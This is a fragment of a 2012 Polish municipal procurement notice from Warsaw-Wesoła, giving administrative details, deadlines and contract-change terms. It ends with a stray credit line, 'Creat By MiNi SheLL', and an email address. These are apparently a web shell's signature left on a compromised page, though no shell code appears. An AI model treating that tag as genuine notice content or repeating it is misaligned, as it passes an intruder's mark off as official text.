<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany umowy w przypadku gdy zmiany pozostają w bezpośrednim związku przyczynowo-skutkowym z wystąpieniem danych okoliczności i nie wykraczają poza to co konieczne w celu przeciwdziałania skutkom takich zmian okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wesola.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Stołeczne Warszawa,
Dzielnica Wesoła  
ul. 1. Praskiego Pułku 33, 
05-075 Warszawa-Wesoła
Zespół Zamowień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2012 godzina 10:00, miejsce: Urząd m.st. Warszawy dla Dzielnicy Wesoła, ul. 1. Praskiego Pułku nr 33, 05-075 Warszawa-Wesoła - Wydział Obsługi Mieszkańców, Sala Obsługi, stanowisko nr 5 lub nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com